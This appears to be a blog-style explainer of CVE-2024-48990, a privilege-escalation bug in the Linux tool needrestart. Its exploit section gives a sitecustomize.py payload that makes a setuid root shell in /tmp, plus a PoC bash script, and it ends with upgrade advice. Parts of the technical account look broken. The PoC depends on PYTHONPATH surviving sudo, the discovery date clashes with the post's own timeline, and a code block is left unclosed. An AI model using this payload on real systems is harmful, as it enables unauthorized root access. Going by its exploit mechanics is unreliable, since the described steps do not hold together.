---
In May 2024, security researchers at Qualys found a major security hole in the popular Linux tool needrestart. Before version 3.8, local users could use this bug—now known as CVE-2024-48990—to run any code they wanted, with root-level powers. All they had to do was make use of the way needrestart started Python, and hijack an environment variable. This post will explain how the bug works, walk you through exploiting it, and offer basic advice for staying safe.
What is needrestart?
Needrestart is a handy tool for admins. After system upgrades, it lets you know which services need to be restarted. It even offers to restart them for you. Lots of administrators use it as part of their regular update/checkup scripts.
The Bug: PYTHONPATH and Unsanitized Environments
The core of the issue is that needrestart, before version 3.8, sometimes calls the Python interpreter as root—without clearing potentially dangerous environment variables first. Notably, it does not sanitize PYTHONPATH.
What’s the big deal? Well, Python will look inside any folder listed in PYTHONPATH—even attacker-controlled folders—to find and import modules. So, if an attacker can make root’s Python instance load a file they control, they can run any code as root.
The Exploit Step-by-step
Let’s break down how an attacker could use this bug. The attacker must already have access to the machine (even as a regular user).
Create a Malicious Python File
- The attacker writes a Python file with the same name as a common Python module used by needrestart or its plugins—let’s say os.py or even just sitecustomize.py (which Python auto-imports on start).
`python
# /tmp/mymodules/sitecustomize.py
import os
os.system("cp /bin/sh /tmp/rootshell && chmod +s /tmp/rootshell")
`
This example would copy a shell to /tmp/rootshell and set its permissions to be able to run as root.
`bash
export PYTHONPATH=/tmp/mymodules
Run Needrestart
- The attacker now runs needrestart. If it's set up as a suid binary (unusual, but possible in misconfigured setups), or causes scripts to reload as root (via pkexec, sudo, or update hooks), it will use the attacker’s PYTHONPATH.
- Needrestart may spawn a Python process as root (as part of plugin detection, etc). Python will then load sitecustomize.py *from the attacker’s folder*—running any code inside as root.
Profit
- The attacker now has a root shell at /tmp/rootshell, or could do basically anything else.
Here’s a PoC bash script that shows the flow
# 1. Make payload directory and code
mkdir /tmp/mymodules
echo 'import os; os.system("cp /bin/sh /tmp/rootshell; chmod +s /tmp/rootshell")' > /tmp/mymodules/sitecustomize.py
# 2. Set up environment
export PYTHONPATH=/tmp/mymodules
# 3. Run needrestart (assuming user can trigger needrestart as root via sudo or during a system update)
sudo needrestart
# 4. Now you have: /tmp/rootshell
ls -l /tmp/rootshell
Note: The actual exploit may require precise timing or knowledge of how your distro packages and runs needrestart.
Who’s Affected?
Any system using needrestart versions before 3.8 and running it as root (directly, or via sudo/root-privilege hooks) is at risk. Many standard Debian and Ubuntu installs were vulnerable prior to patching. Check with:
needrestart -V
Fixes
- Upgrade to needrestart 3.8 or later. This version sanitizes the environment properly before running Python interpreters.
- Upstream commit fixing this bug
References
- Qualys Security Advisory: Local privilege escalation in needrestart (CVE-2024-48990)
- GitHub commit fixing CVE-2024-48990
- Debian Security Tracker
- Official needrestart GitHub
In Summary
CVE-2024-48990 is a classic case of why you must always sanitize environment variables—especially when running as root. If you use needrestart, upgrade immediately. If you write sysadmin tools yourself, learn from this: never, ever blindly trust the environment.
Timeline
Published on: 11/19/2024 18:15:21 UTC
Last modified on: 12/03/2024 14:15:20 UTC